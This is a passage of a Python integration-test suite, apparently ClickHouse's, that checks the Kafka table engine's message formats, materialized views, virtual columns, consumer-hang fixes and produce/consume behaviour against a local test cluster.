0\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# ],
# },
}
for format_name, format_opts in all_formats.items():
print('Set up {}'.format(format_name))
topic_name='format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name, extra_settings=format_opts.get('extra_settings') or ''))
time.sleep(12)
for format_name, format_opts in all_formats.items():
print('Checking {}'.format(format_name))
topic_name='format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1,2,3] if format_opts.get('supports_empty_value', False) else [0,1,2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0 = offsets[0], offset_1 = offsets[1], offset_2 = offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(name):
client = BrokerConnection('localhost', 9092, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic':topic, 'partitions':partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print("kafka_id is {}".format(kafka_id))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available()
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro", ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == u'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == u'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }', '{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer','100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
time.sleep(10)
instance.query('SELECT * FROM test.view')
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
time.sleep(0.5)
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
#kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
#echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_select_empty(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in offsets.items():
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages*batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query('''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''', ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001, headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002, headers=[('empty_value', ''),('', 'empty name'), ('',''), ('repetition', '1'), ('repetition', '2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003, headers=[('b', 'b'),('a', 'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004, headers=[('a', 'a'),('b', 'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
#pprint.pprint(members)
members[0]['client_id'] = u'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = u'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(240)
def test_kafka_produce_key_timestamp(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1,1,'k1',1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2,2,'k2',1577836802))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3,3,'k3',1577836803,4,4,'k4',1577836804))
